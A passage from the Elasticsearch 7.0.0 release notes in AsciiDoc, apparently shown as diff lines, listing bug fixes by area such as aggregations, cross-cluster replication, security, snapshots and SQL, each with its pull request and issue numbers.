{es-pull}37775[#37775] -* Bubble exceptions up in ClusterApplierService {es-pull}37729[#37729] -* Use m_m_nodes from Zen1 master for Zen2 bootstrap {es-pull}37701[#37701] -* Add tool elasticsearch-node unsafe-bootstrap {es-pull}37696[#37696] -* Report terms and version if cluster does not form {es-pull}37473[#37473] -* Bootstrap a Zen2 cluster once quorum is discovered {es-pull}37463[#37463] -* Zen2: Add join validation 
{es-pull}37203[#37203] -* Publish cluster states in chunks {es-pull}36973[#36973] - - - -[[bug-7.0.0]] -[discrete] -=== Bug fixes - -Aggregations:: -* Fix InternalAutoDateHistogram reproducible failure {es-pull}32723[#32723] (issue: {es-issue}32215[#32215]) -* fix MultiValuesSourceFieldConfig toXContent {es-pull}36525[#36525] (issue: {es-issue}36474[#36474]) -* Cache the score of the parent document in the nested agg {es-pull}36019[#36019] (issues: {es-issue}34555[#34555], {es-issue}35985[#35985]) -* Correct implemented interface of ParsedReverseNested {es-pull}35455[#35455] (issue: {es-issue}35449[#35449]) -* Handle IndexOrDocValuesQuery in composite aggregation {es-pull}35392[#35392] -* Don't load global ordinals with the `map` execution_hint {es-pull}37833[#37833] (issue: {es-issue}37705[#37705]) -* Issue #37303 - Invalid variance fix {es-pull}37384[#37384] (issue: {es-issue}37303[#37303]) -* Skip sibling pipeline aggregators reduction during non-final reduce {es-pull}40101[#40101] (issue: {es-issue}40059[#40059]) -* Extend nextDoc to delegate to the wrapped doc-value iterator for date_nanos {es-pull}39176[#39176] (issue: {es-issue}39107[#39107]) -* Only create MatrixStatsResults on final reduction {es-pull}38130[#38130] (issue: {es-issue}37587[#37587]) - -Allocation:: -* Fix _host based require filters {es-pull}38173[#38173] -* ALLOC: Fail Stale Primary Alloc. Req. without Data {es-pull}37226[#37226] (issue: {es-issue}37098[#37098]) - -Analysis:: -* Close #26771: beider_morse phonetic encoder failure when languageset unspecified {es-pull}26848[#26848] (issue: {es-issue}26771[#26771]) -* Fix PreConfiguredTokenFilters getSynonymFilter() implementations {es-pull}38839[#38839] (issue: {es-issue}38793[#38793]) - -Audit:: -* Fix origin.type for connection_* events {es-pull}36410[#36410] -* Fix IndexAuditTrail rolling restart on rollover edge {es-pull}35988[#35988] (issue: {es-issue}33867[#33867]) -* Fix NPE in Logfile Audit Filter {es-pull}38120[#38120] (issue: {es-issue}38097[#38097]) -* LoggingAuditTrail correctly handle ReplicatedWriteRequest {es-pull}39925[#39925] (issue: {es-issue}39555[#39555]) - -Authorization:: -* Empty GetAliases authorization fix {es-pull}34444[#34444] (issue: {es-issue}31952[#31952]) - -Authentication:: -* Fix kerberos setting registration {es-pull}35986[#35986] (issues: {es-issue}30241[#30241], {es-issue}35942[#35942]) -* Add support for Kerberos V5 Oid {es-pull}35764[#35764] (issue: {es-issue}34763[#34763]) -* Enhance parsing of StatusCode in SAML Responses {es-pull}38628[#38628] -* Limit token expiry to 1 hour maximum {es-pull}38244[#38244] -* Fix expired token message in Exception header {es-pull}37196[#37196] -* Fix NPE in CachingUsernamePasswordRealm {es-pull}36953[#36953] (issue: {es-issue}36951[#36951]) -* Allow non super users to create API keys {es-pull}40028[#40028] (issue: {es-issue}40029[#40029]) -* Use consistent view of realms for authentication {es-pull}38815[#38815] (issue: {es-issue}30301[#30301]) -* Correct authenticate response for API key {es-pull}39684[#39684] -* Fix security index auto-create and state recovery race {es-pull}39582[#39582] - -Build:: -* Use explicit deps on test tasks for check {es-pull}36325[#36325] -* Fix jdbc jar pom to not include deps {es-pull}36036[#36036] (issue: {es-issue}32014[#32014]) -* Fix official plugins list {es-pull}35661[#35661] (issue: {es-issue}35623[#35623]) - -CCR:: -* Fix follow stats API's follower index filtering feature {es-pull}36647[#36647] -* AutoFollowCoordinator should tolerate that auto follow 
patterns may be removed {es-pull}35945[#35945] (issue: {es-issue}35937[#35937]) -* Only auto follow indices when all primary shards have started {es-pull}35814[#35814] (issue: {es-issue}35480[#35480]) -* Avoid NPE in follower stats when no tasks metadata {es-pull}35802[#35802] -* Fix the names of CCR stats endpoints in usage API {es-pull}35438[#35438] -* Prevent CCR recovery from missing documents {es-pull}38237[#38237] -* Fix file reading in ccr restore service {es-pull}38117[#38117] -* Correct argument names in update mapping/settings from leader {es-pull}38063[#38063] -* Ensure changes requests return the latest mapping version {es-pull}37633[#37633] -* Do not set fatal exception when shard follow task is stopped. {es-pull}37603[#37603] -* Add fatal_exception field for ccr stats in monitoring mapping {es-pull}37563[#37563] -* Do not add index event listener if CCR disabled {es-pull}37432[#37432] -* When removing an AutoFollower also mark it as removed. {es-pull}37402[#37402] (issue: {es-issue}36761[#36761]) -* Make shard follow tasks more resilient for restarts {es-pull}37239[#37239] (issue: {es-issue}37231[#37231]) -* Resume follow Api should not require a request body {es-pull}37217[#37217] (issue: {es-issue}37022[#37022]) -* Report error if auto follower tries auto follow a leader index with soft deletes disabled {es-pull}36886[#36886] (issue: {es-issue}33007[#33007]) -* Remote cluster license checker and no license info. {es-pull}36837[#36837] (issue: {es-issue}36815[#36815]) -* Make CCR resilient against missing remote cluster connections {es-pull}36682[#36682] (issues: {es-issue}36255[#36255], {es-issue}36667[#36667]) -* AutoFollowCoordinator and follower index already created {es-pull}36540[#36540] (issue: {es-issue}33007[#33007]) -* Safe publication of AutoFollowCoordinator {es-pull}40153[#40153] (issue: {es-issue}38560[#38560]) -* Enable reading auto-follow patterns from x-content {es-pull}40130[#40130] (issue: {es-issue}40128[#40128]) -* Stop auto-followers on shutdown {es-pull}40124[#40124] -* Protect against the leader index being removed {es-pull}39351[#39351] (issue: {es-issue}39308[#39308]) -* Handle the fact that `ShardStats` instance may have no commit or seqno stats {es-pull}38782[#38782] (issue: {es-issue}38779[#38779]) -* Fix LocalIndexFollowingIT#testRemoveRemoteConnection() test {es-pull}38709[#38709] (issue: {es-issue}38695[#38695]) -* Fix shard follow task startup error handling {es-pull}39053[#39053] (issue: {es-issue}38779[#38779]) -* Filter out upgraded version index settings when starting index following {es-pull}38838[#38838] (issue: {es-issue}38835[#38835]) - -Circuit Breakers:: -* Modify `BigArrays` to take name of circuit breaker {es-pull}36461[#36461] (issue: {es-issue}31435[#31435]) - -Core:: -* Fix CompositeBytesReference#slice to not throw AIOOBE with legal offsets. 
{es-pull}35955[#35955] (issue: {es-issue}35950[#35950]) -* Suppress CachedTimeThread in hot threads output {es-pull}35558[#35558] (issue: {es-issue}23175[#23175]) -* Upgrade to Joda 2.10.1 {es-pull}35410[#35410] (issue: {es-issue}33749[#33749]) - -CRUD:: -* Fix Reindex from remote query logic {es-pull}36908[#36908] -* Synchronize WriteReplicaResult callbacks {es-pull}36770[#36770] -* Cascading primary failure lead to MSU too low {es-pull}40249[#40249] -* Store Pending Deletions Fix {es-pull}40345[#40345] (issue: {es-issue}40249[#40249]) -* ShardBulkAction ignore primary response on primary {es-pull}38901[#38901] - -Cluster Coordination:: -* Fix node tool cleanup {es-pull}39389[#39389] -* Avoid serialising state if it was already serialised {es-pull}39179[#39179] -* Do not perform cleanup if Manifest write fails with dirty exception {es-pull}40519[#40519] (issue: {es-issue}39077[#39077]) -* Cache compressed cluster state size {es-pull}39827[#39827] (issue: {es-issue}39806[#39806]) -* Drop node if asymmetrically partitioned from master {es-pull}39598[#39598] -* Fixing the custom object serialization bug in diffable utils. {es-pull}39544[#39544] -* Clean GatewayAllocator when stepping down as master {es-pull}38885[#38885] - -Distributed:: -* Combine the execution of an exclusive replica operation with primary term update {es-pull}36116[#36116] (issue: {es-issue}35850[#35850]) -* ActiveShardCount should not fail when closing the index {es-pull}35936[#35936] -* TransportVerifyShardBeforeCloseAction should force a flush {es-pull}38401[#38401] (issues: {es-issue}33888[#33888], {es-issue}37961[#37961]) -* Fix limit on retaining sequence number {es-pull}37992[#37992] (issue: {es-issue}37165[#37165]) -* Close Index API should force a flush if a sync is needed {es-pull}37961[#37961] (issues: {es-issue}33888[#33888], {es-issue}37426[#37426]) -* Force Refresh Listeners when Acquiring all Operation Permits {es-pull}36835[#36835] -* Replaced the word 'shards' with 'replicas' in an error message. (#36234) {es-pull}36275[#36275] (issue: {es-issue}36234[#36234]) -* Ignore waitForActiveShards when syncing leases {es-pull}39224[#39224] (issue: {es-issue}39089[#39089]) -* Fix synchronization in LocalCheckpointTracker#contains {es-pull}38755[#38755] (issues: {es-issue}33871[#33871], {es-issue}38633[#38633]) -* Enforce retention leases require soft deletes {es-pull}39922[#39922] (issue: {es-issue}39914[#39914]) -* Treat TransportService stopped error as node is closing {es-pull}39800[#39800] (issue: {es-issue}39584[#39584]) -* Use cause to determine if node with primary is closing {es-pull}39723[#39723] (issue: {es-issue}39584[#39584]) -* Don’t ack if unable to remove failing replica {es-pull}39584[#39584] (issue: {es-issue}39467[#39467]) -* Fix NPE on Stale Index in IndicesService {es-pull}38891[#38891] (issue: {es-issue}38845[#38845]) - -Engine:: -* Set Lucene version upon index creation. 
{es-pull}36038[#36038] (issue: {es-issue}33826[#33826]) -* Wrap can_match reader with ElasticsearchDirectoryReader {es-pull}35857[#35857] -* Copy checkpoint atomically when rolling generation {es-pull}35407[#35407] -* Subclass NIOFSDirectory instead of using FileSwitchDirectory {es-pull}37140[#37140] (issues: {es-issue}36668[#36668], {es-issue}37111[#37111]) -* Bubble up exception when processing NoOp {es-pull}39338[#39338] (issue: {es-issue}38898[#38898]) -* ReadOnlyEngine should update translog recovery state information {es-pull}39238[#39238] -* Advance max_seq_no before add operation to Lucene {es-pull}38879[#38879] (issue: {es-issue}31629[#31629]) - -Features/Features:: -* Only count some fields types for deprecation check {es-pull}40166[#40166] -* Deprecation check for indices with very large numbers of fields {es-pull}39869[#39869] (issue: {es-issue}39851[#39851]) - -Features/ILM:: -* Preserve ILM operation mode when creating new lifecycles {es-pull}38134[#38134] (issues: {es-issue}38229[#38229], {es-issue}38230[#38230]) -* Retry ILM steps that fail due to SnapshotInProgressException {es-pull}37624[#37624] (issues: {es-issue}37541[#37541], {es-issue}37552[#37552]) -* Remove `indexing_complete` when removing policy {es-pull}36620[#36620] -* Handle failure to release retention leases in ILM {es-pull}39281[#39281] (issue: {es-issue}39181[#39181]) -* Correct ILM metadata minimum compatibility version {es-pull}40569[#40569] (issue: {es-issue}40565[#40565]) -* Handle null retention leases in WaitForNoFollowersStep {es-pull}40477[#40477] -* Allow ILM to stop if indices have nonexistent policies {es-pull}40820[#40820] (issue: {es-issue}40824[#40824]) - -Features/Indices APIs:: -* Validate top-level keys for create index request (#23755) {es-pull}23869[#23869] (issue: {es-issue}23755[#23755]) -* Reject delete index requests with a body {es-pull}37501[#37501] (issue: {es-issue}8217[#8217]) -* Fix duplicate phrase in shrink/split error message {es-pull}36734[#36734] (issue: {es-issue}36729[#36729]) -* Get Aliases with wildcard exclusion expression {es-pull}34230[#34230] (issues: {es-issue}33518[#33518], {es-issue}33805[#33805], {es-issue}34144[#34144]) - -Features/Ingest:: -* Fix Deprecation Warning in Script Proc. 
{es-pull}32407[#32407] -* Support unknown fields in ingest pipeline map configuration {es-pull}38352[#38352] (issue: {es-issue}36938[#36938]) -* Ingest node - user_agent, move device parsing to an object {es-pull}38115[#38115] (issues: {es-issue}37329[#37329], {es-issue}38094[#38094]) -* Fix on_failure with Drop processor {es-pull}36686[#36686] (issue: {es-issue}36151[#36151]) -* Support default pipelines + bulk upserts {es-pull}36618[#36618] (issue: {es-issue}36219[#36219]) -* Ingest ingest then create index {es-pull}39607[#39607] (issues: {es-issue}32758[#32758], {es-issue}32786[#32786], {es-issue}36545[#36545]) - -Features/Java High Level REST Client:: -* Drop extra level from user parser {es-pull}34932[#34932] -* Update IndexTemplateMetadata to allow unknown fields {es-pull}38448[#38448] (issue: {es-issue}36938[#36938]) -* `if_seq_no` and `if_primary_term` parameters aren't wired correctly in REST Client's CRUD API {es-pull}38411[#38411] -* Update Rollup Caps to allow unknown fields {es-pull}38339[#38339] (issue: {es-issue}36938[#36938]) -* Fix ILM explain response to allow unknown fields {es-pull}38054[#38054] (issue: {es-issue}36938[#36938]) -* Fix ILM status to allow unknown fields {es-pull}38043[#38043] (issue: {es-issue}36938[#36938]) -* Fix ILM Lifecycle Policy to allow unknown fields {es-pull}38041[#38041] (issue: {es-issue}36938[#36938]) -* Update authenticate to allow unknown fields {es-pull}37713[#37713] (issue: {es-issue}36938[#36938]) -* Update verify repository to allow unknown fields {es-pull}37619[#37619] (issue: {es-issue}36938[#36938]) -* Update get users to allow unknown fields {es-pull}37593[#37593] (issue: {es-issue}36938[#36938]) -* Update Execute Watch to allow unknown fields {es-pull}37498[#37498] (issue: {es-issue}36938[#36938]) -* Update Put Watch to allow unknown fields {es-pull}37494[#37494] (issue: {es-issue}36938[#36938]) -* Update Delete Watch to allow unknown fields {es-pull}37435[#37435] (issue: {es-issue}36938[#36938]) -* Fix rest reindex test for IPv4 addresses {es-pull}37310[#37310] -* Fix weighted_avg parser not found for RestHighLevelClient {es-pull}37027[#37027] (issue: {es-issue}36861[#36861]) - -Features/Java Low Level REST Client:: -* Remove I/O pool blocking sniffing call from onFailure callback, add some logic around host exclusion {es-pull}27985[#27985] (issue: {es-issue}27984[#27984]) -* Fix potential IllegalCapacityException in LLRC when selecting nodes {es-pull}37821[#37821] - -Features/Monitoring:: -* Allow built-in monitoring_user role to call GET _xpack API {es-pull}38060[#38060] (issue: {es-issue}37970[#37970]) -* Don't emit deprecation warnings on calls to the monitoring bulk API. 
{es-pull}39805[#39805] (issue: {es-issue}39336[#39336]) - -Features/Watcher:: -* Ignore system locale/timezone in croneval CLI tool {es-pull}33215[#33215] -* Support merge nested Map in list for JIRA configurations {es-pull}37634[#37634] (issue: {es-issue}30068[#30068]) -* Watcher accounts constructed lazily {es-pull}36656[#36656] -* Ensures watch definitions are valid json {es-pull}30692[#30692] (issue: {es-issue}29746[#29746]) -* Use non-ILM template setting up watch history template & ILM disabled {es-pull}39325[#39325] (issue: {es-issue}38805[#38805]) -* Only flush Watcher's bulk processor if Watcher is enabled {es-pull}38803[#38803] (issue: {es-issue}38798[#38798]) -* Fix Watcher stats class cast exception {es-pull}39821[#39821] (issue: {es-issue}39780[#39780]) -* Use any index specified by .watches for Watcher {es-pull}39541[#39541] (issue: {es-issue}39478[#39478]) -* Resolve concurrency with watcher trigger service {es-pull}39092[#39092] (issue: {es-issue}39087[#39087]) -* Metric on watcher stats is a list not an enum {es-pull}39114[#39114] - -Geo:: -* Test `GeoShapeQueryTests#testPointsOnly` fails {es-pull}27454[#27454] -* More robust handling of ignore_malformed in geoshape parsing {es-pull}35603[#35603] (issues: {es-issue}34047[#34047], {es-issue}34498[#34498]) -* Better handling of malformed geo_points {es-pull}35554[#35554] (issue: {es-issue}35419[#35419]) -* Enables coerce support in WKT polygon parser {es-pull}35414[#35414] (issue: {es-issue}35059[#35059]) -* Fix GeoHash PrefixTree BWC {es-pull}38584[#38584] (issue: {es-issue}38494[#38494]) -* Do not normalize the longitude with value -180 for Lucene shapes {es-pull}37299[#37299] (issue: {es-issue}37297[#37297]) -* Geo Point parse error fix {es-pull}40447[#40447] (issue: {es-issue}17617[#17617]) - -Highlighting:: -* Bug fix for AnnotatedTextHighlighter - port of 39525 {es-pull}39750[#39750] (issue: {es-issue}39525[#39525]) - -Infra/Core:: -* Ensure shard is refreshed once it's inactive {es-pull}27559[#27559] (issue: {es-issue}27500[#27500]) -* Bubble-up exceptions from scheduler {es-pull}38317[#38317] (issue: {es-issue}38014[#38014]) -* Revert back to joda's multi date formatters {es-pull}36814[#36814] (issues: {es-issue}36447[#36447], {es-issue}36602[#36602]) -* Propagate Errors in executors to uncaught exception handler {es-pull}36137[#36137] (issue: {es-issue}28667[#28667]) -* Correct name of basic_date_time_no_millis {es-pull}39367[#39367] -* Allow single digit milliseconds in strict date parsing {es-pull}40676[#40676] (issue: {es-issue}40403[#40403]) -* Parse composite patterns using ClassicFormat.parseObject {es-pull}40100[#40100] (issue: {es-issue}39916[#39916]) -* Bat scripts to work with JAVA_HOME with parantheses {es-pull}39712[#39712] (issues: {es-issue}30606[#30606], {es-issue}33405[#33405], {es-issue}38578[#38578], {es-issue}38624[#38624]) -* Change licence expiration date pattern {es-pull}39681[#39681] (issue: {es-issue}39136[#39136]) -* Fix DateFormatters.parseMillis when no timezone is given {es-pull}39100[#39100] (issue: {es-issue}39067[#39067]) -* Don't close caches while there might still be in-flight requests. 
{es-pull}38958[#38958] (issue: {es-issue}37117[#37117])
-
-Infra/Packaging::
-* Remove NOREPLACE for /etc/elasticsearch in rpm and deb {es-pull}37839[#37839]
-* Packaging: Update marker used to allow ELASTIC_PASSWORD {es-pull}37243[#37243] (issue: {es-issue}37240[#37240])
-* Remove permission editing in postinst {es-pull}37242[#37242] (issue: {es-issue}37143[#37143])
-* Some elasticsearch-cli tools could not be run from outside ES_HOME {es-pull}39937[#39937]
-* Obsolete pre 7.0 noarch package in rpm {es-pull}39472[#39472] (issue: {es-issue}39414[#39414])
-* Suppress error message when `/proc/sys/vm/max_map_count` does not exist. {es-pull}35933[#35933]
-* Use TAR instead of DOCKER build type before 6.7.0 {es-pull}40723[#40723] (issues: {es-issue}39378[#39378], {es-issue}40511[#40511])
-* Source additional files correctly in elasticsearch-cli {es-pull}40890[#40890] (issue: {es-issue}40889[#40889])
-
-Infra/REST API::
-* Reject all requests that have an unconsumed body {es-pull}37504[#37504] (issues: {es-issue}30792[#30792], {es-issue}37501[#37501], {es-issue}8217[#8217])
-* Fix #38623 remove xpack namespace REST API {es-pull}38625[#38625]
-* Remove the "xpack" namespace from the REST API {es-pull}38623[#38623]
-* Update spec files that erroneously documented parts as optional {es-pull}39122[#39122]
-* ilm.explain_lifecycle documents human again {es-pull}39113[#39113]
-* Index on rollup.rollup_search.json is a list {es-pull}39097[#39097]
-
-Infra/Scripting::
-* Fix Painless void return bug {es-pull}38046[#38046]
-* Correct bug in ScriptDocValues {es-pull}40488[#40488]
-
-Infra/Settings::
-* Change format how settings represent lists / array {es-pull}26723[#26723]
-* Fix setting by time unit {es-pull}37192[#37192]
-* Fix handling of fractional byte size value settings {es-pull}37172[#37172]
-* Fix handling of fractional time value settings {es-pull}37171[#37171]
-
-Infra/Transport API::
-* Remove version read/write logic in Verify Response {es-pull}30879[#30879] (issue: {es-issue}30807[#30807])
-* Enable muted Repository test {es-pull}30875[#30875] (issue: {es-issue}30807[#30807])
-* Bad regex in CORS settings should throw a nicer error {es-pull}29108[#29108]
-
-Index APIs::
-* Fix duplicate phrase in shrink/split error message {es-pull}36734[#36734] (issue: {es-issue}36729[#36729])
-* Raise a 404 exception when document source is not found (#33384) {es-pull}34083[#34083] (issue: {es-issue}33384[#33384])
-
-Ingest::
-* Fix on_failure with Drop processor {es-pull}36686[#36686] (issue: {es-issue}36151[#36151])
-* Support default pipelines + bulk upserts {es-pull}36618[#36618] (issue: {es-issue}36219[#36219])
-* Support default pipeline through an alias {es-pull}36231[#36231] (issue: {es-issue}35817[#35817])
-
-License::
-* Update versions for start_trial after backport {es-pull}30218[#30218] (issue: {es-issue}30135[#30135])
-* Do not serialize basic license exp in x-pack info {es-pull}30848[#30848]
-
-Machine Learning::
-* Interrupt Grok in file structure finder timeout {es-pull}36588[#36588]
-* Prevent stack overflow while copying ML jobs and datafeeds {es-pull}36370[#36370] (issue: {es-issue}36360[#36360])
-* Adjust file structure finder parser config {es-pull}35935[#35935]
-* Fix find_file_structure NPE with should_trim_fields {es-pull}35465[#35465] (issue: {es-issue}35462[#35462])
-* Prevent notifications being created on deletion of a non existent job {es-pull}35337[#35337] (issues: {es-issue}34058[#34058], {es-issue}35336[#35336]) -* Clear Job#finished_time when it is opened (#32605) {es-pull}32755[#32755] -* Fix thread leak when waiting for job flush (#32196) {es-pull}32541[#32541] (issue: {es-issue}32196[#32196]) -* Fix CPoissonMeanConjugate sampling error. {ml-pull}335[#335] -* Report index unavailable instead of waiting for lazy node {es-pull}38423[#38423] -* Fix error race condition on stop _all datafeeds and close _all jobs {es-pull}38113[#38113] (issue: {es-issue}37959[#37959]) -* Update ML results mappings on process start {es-pull}37706[#37706] (issue: {es-issue}37607[#37607]) -* Prevent submit after autodetect worker is stopped {es-pull}37700[#37700] (issue: {es-issue}37108[#37108]) -* Fix ML datafeed CCS with wildcarded cluster name {es-pull}37470[#37470] (issue: {es-issue}36228[#36228]) -* Update error message for process update {es-pull}37363[#37363] -* Wait for autodetect to be ready in the datafeed {es-pull}37349[#37349] (issues: {es-issue}36810[#36810], {es-issue}37227[#37227]) -* Stop datafeeds running when their jobs are stale {es-pull}37227[#37227] (issue: {es-issue}36810[#36810]) -* Order GET job stats response by job id {es-pull}36841[#36841] (issue: {es-issue}36683[#36683]) -* Make GetJobStats work with arbitrary wildcards and groups {es-pull}36683[#36683] (issue: {es-issue}34745[#34745]) -* Fix datafeed skipping first bucket after lookback when aggs are … {es-pull}39859[#39859] (issue: {es-issue}39842[#39842]) -* Refactoring lazy query and agg parsing {es-pull}39776[#39776] (issue: {es-issue}39528[#39528]) -* Stop the ML memory tracker before closing node {es-pull}39111[#39111] (issue: {es-issue}37117[#37117]) -* Scrolling datafeed should clear scroll contexts on error {es-pull}40773[#40773] (issue: {es-issue}40772[#40772]) - -Mapping:: -* Ensure that field aliases cannot be used in multi-fields. {es-pull}32219[#32219] -* Treat put-mapping calls with `_doc` as a top-level key as typed calls. {es-pull}38032[#38032] -* Correct deprec log in RestGetFieldMappingAction {es-pull}37843[#37843] (issue: {es-issue}37667[#37667]) -* Restore a noop _all metadata field for 6x indices {es-pull}37808[#37808] (issue: {es-issue}37429[#37429]) -* Make sure PutMappingRequest accepts content types other than JSON. {es-pull}37720[#37720] -* Make sure to use the resolved type in DocumentMapperService#extractMappings. {es-pull}37451[#37451] (issue: {es-issue}36811[#36811]) -* Improve Precision for scaled_float {es-pull}37169[#37169] (issue: {es-issue}32570[#32570]) -* Make sure to accept empty unnested mappings in create index requests. {es-pull}37089[#37089] -* Stop automatically nesting mappings in index creation requests. {es-pull}36924[#36924] -* Rewrite SourceToParse with resolved docType {es-pull}36921[#36921] (issues: {es-issue}35790[#35790], {es-issue}36769[#36769]) -* Optimise rejection of out-of-range `long` values {es-pull}40325[#40325] (issues: {es-issue}26137[#26137], {es-issue}40323[#40323]) -* Make sure to reject mappings with type _doc when include_type_name is false. 
{es-pull}38270[#38270] (issue: {es-issue}38266[#38266])
-
-Network::
-* Adjust SSLDriver behavior for JDK11 changes {es-pull}32145[#32145] (issues: {es-issue}32122[#32122], {es-issue}32144[#32144])
-* Netty4SizeHeaderFrameDecoder error {es-pull}31057[#31057]
-* Fix memory leak in http pipelining {es-pull}30815[#30815] (issue: {es-issue}30801[#30801])
-* Fix issue with finishing handshake in ssl driver {es-pull}30580[#30580]
-* Do not resolve addresses in remote connection info {es-pull}36671[#36671] (issue: {es-issue}35658[#35658])
-* Always compress based on the settings {es-pull}36522[#36522] (issue: {es-issue}36399[#36399])
-* http.publish_host Should Contain CNAME {es-pull}32806[#32806] (issue: {es-issue}22029[#22029])
-* Add TRACE, CONNECT, and PATCH http methods {es-pull}31035[#31035] (issue: {es-issue}31017[#31017])
-* Transport client: Don't validate node in handshake {es-pull}30737[#30737] (issue: {es-issue}30141[#30141])
-* Remove potential nio selector leak {es-pull}27825[#27825]
-* Fix issue where the incorrect buffers are written {es-pull}27695[#27695] (issue: {es-issue}27551[#27551])
-* Do not set SO_LINGER on server channels {es-pull}26997[#26997]
-* Do not set SO_LINGER to 0 when not shutting down {es-pull}26871[#26871] (issue: {es-issue}26764[#26764])
-* Release pipelined http responses on close {es-pull}26226[#26226]
-* Reload SSL context on file change for LDAP {es-pull}36937[#36937] (issues: {es-issue}30509[#30509], {es-issue}36923[#36923])
-
-Packaging::
-* Fix error message when package install fails due to missing Java {es-pull}36077[#36077] (issue: {es-issue}31845[#31845])
-* Add missing entries to conffiles {es-pull}35810[#35810] (issue: {es-issue}35691[#35691])
-
-Plugins::
-* Ensure that azure stream has socket privileges {es-pull}28751[#28751] (issue: {es-issue}28662[#28662])
-
-Ranking::
-* QueryRescorer should keep the window size when rewriting {es-pull}36836[#36836]
-
-Recovery::
-* Register ResyncTask.Status as a NamedWriteable {es-pull}36610[#36610]
-* RecoveryMonitor#lastSeenAccessTime should be volatile {es-pull}36781[#36781]
-* Create retention leases file during recovery {es-pull}39359[#39359] (issue: {es-issue}37165[#37165])
-* Recover peers from translog, ignoring soft deletes {es-pull}38904[#38904] (issue: {es-issue}37165[#37165])
-* Retain history for peer recovery using leases {es-pull}38855[#38855]
-* Resync should not send operations without sequence number {es-pull}40433[#40433]
-
-Rollup::
-* Fix rollup search statistics {es-pull}36674[#36674]
-* Fix Rollup's metadata parser {es-pull}36791[#36791] (issue: {es-issue}36726[#36726])
-* Remove timezone validation on rollup range queries {es-pull}40647[#40647]
-* Rollup ignores time_zone on date histogram {es-pull}40844[#40844]
-
-Scripting::
-* Properly support no-offset date formatting {es-pull}36316[#36316] (issue: {es-issue}36306[#36306])
-* [Painless] Generate Bridge Methods {es-pull}36097[#36097]
-* Fix serialization bug in painless execute api request {es-pull}36075[#36075] (issue: {es-issue}36050[#36050])
-* Actually add joda time back to whitelist {es-pull}35965[#35965] (issue: {es-issue}35915[#35915])
-* Add back joda to
whitelist {es-pull}35915[#35915] (issue: {es-issue}35913[#35913]) - -Settings:: -* Correctly Identify Noop Updates {es-pull}36560[#36560] (issue: {es-issue}36496[#36496]) - -Search:: -* Ensure realtime `_get` and `_termvectors` don't run on the network thread {es-pull}33814[#33814] (issue: {es-issue}27500[#27500]) -* [bug] fuzziness custom auto {es-pull}33462[#33462] (issue: {es-issue}33454[#33454]) -* Fix inner hits retrieval when stored fields are disabled (_none_) {es-pull}33018[#33018] (issue: {es-issue}32941[#32941]) -* Set maxScore for empty TopDocs to Nan rather than 0 {es-pull}32938[#32938] -* Handle leniency for cross_fields type in multi_match query {es-pull}27045[#27045] (issue: {es-issue}23210[#23210]) -* Raise IllegalArgumentException instead if query validation failed {es-pull}26811[#26811] (issue: {es-issue}26799[#26799]) -* Inner hits fail to propagate doc-value format. {es-pull}36310[#36310] -* Fix custom AUTO issue with Fuzziness#toXContent {es-pull}35807[#35807] (issue: {es-issue}33462[#33462]) -* Fix analyzed prefix query in query_string {es-pull}35756[#35756] (issue: {es-issue}31702[#31702]) -* Fix problem with MatchNoDocsQuery in disjunction queries {es-pull}35726[#35726] (issue: {es-issue}34708[#34708]) -* Fix phrase_slop in query_string query {es-pull}35533[#35533] (issue: {es-issue}35125[#35125]) -* Add a More Like This query routing requirement check (#29678) {es-pull}33974[#33974] -* Look up connection using the right cluster alias when releasing contexts {es-pull}38570[#38570] -* Fix fetch source option in expand search phase {es-pull}37908[#37908] (issue: {es-issue}23829[#23829]) -* Change `rational` to `saturation` in script_score {es-pull}37766[#37766] (issue: {es-issue}37714[#37714]) -* Throw if two inner_hits have the same name {es-pull}37645[#37645] (issue: {es-issue}37584[#37584]) -* Ensure either success or failure path for SearchOperationListener is called {es-pull}37467[#37467] (issue: {es-issue}37185[#37185]) -* `query_string` should use indexed prefixes {es-pull}36895[#36895] -* Avoid duplicate types deprecation messages in search-related APIs. {es-pull}36802[#36802] -* Serialize top-level pipeline aggs as part of InternalAggregations {es-pull}40177[#40177] (issues: {es-issue}40059[#40059], {es-issue}40101[#40101]) -* CCS: Skip empty search hits when minimizing round-trips {es-pull}40098[#40098] (issues: {es-issue}32125[#32125], {es-issue}40067[#40067]) -* CCS: Disable minimizing round-trips when dfs is requested {es-pull}40044[#40044] (issue: {es-issue}32125[#32125]) -* Fix Fuzziness#asDistance(String) {es-pull}39643[#39643] (issue: {es-issue}39614[#39614]) -* Fix alias resolution runtime complexity. 
{es-pull}40263[#40263] (issue: {es-issue}40248[#40248]) - -Security:: -* Handle 6.4.0+ BWC for Application Privileges {es-pull}32929[#32929] -* Remove license state listeners on closeables {es-pull}36308[#36308] (issues: {es-issue}33328[#33328], {es-issue}35627[#35627], {es-issue}35628[#35628]) -* Fix exit code for Security CLI tools {es-pull}37956[#37956] (issue: {es-issue}37841[#37841]) -* Fix potential NPE in UsersTool {es-pull}37660[#37660] -* Remove dynamic objects from security index {es-pull}40499[#40499] (issue: {es-issue}35460[#35460]) -* Fix libs:ssl-config project setup {es-pull}39074[#39074] -* Do not create the missing index when invoking getRole {es-pull}39039[#39039] - -Snapshot/Restore:: -* Upgrade GCS Dependencies to 1.55.0 {es-pull}36634[#36634] (issues: {es-issue}35229[#35229], {es-issue}35459[#35459]) -* Improve Resilience SnapshotShardService {es-pull}36113[#36113] (issue: {es-issue}32265[#32265]) -* Keep SnapshotsInProgress State in Sync with Routing Table {es-pull}35710[#35710] -* Ensure that gcs client creation is privileged {es-pull}25938[#25938] (issue: {es-issue}25932[#25932]) -* Make calls to CloudBlobContainer#exists privileged {es-pull}25937[#25937] (issue: {es-issue}25931[#25931]) -* Fix Concurrent Snapshot Ending And Stabilize Snapshot Finalization {es-pull}38368[#38368] (issue: {es-issue}38226[#38226]) -* Fix Two Races that Lead to Stuck Snapshots {es-pull}37686[#37686] (issues: {es-issue}32265[#32265], {es-issue}32348[#32348]) -* Fix Race in Concurrent Snapshot Delete and Create {es-pull}37612[#37612] (issue: {es-issue}37581[#37581]) -* Streamline S3 Repository- and Client-Settings {es-pull}37393[#37393] -* Blob store compression fix {es-pull}39073[#39073] - -SQL:: -* Fix translation of LIKE/RLIKE keywords {es-pull}36672[#36672] (issues: {es-issue}36039[#36039], {es-issue}36584[#36584]) -* Scripting support for casting functions CAST and CONVERT {es-pull}36640[#36640] (issue: {es-issue}36061[#36061]) -* Fix translation to painless for conditionals {es-pull}36636[#36636] (issue: {es-issue}36631[#36631]) -* Concat should be always not nullable {es-pull}36601[#36601] (issue: {es-issue}36169[#36169]) -* Fix MOD() for long and integer arguments {es-pull}36599[#36599] (issue: 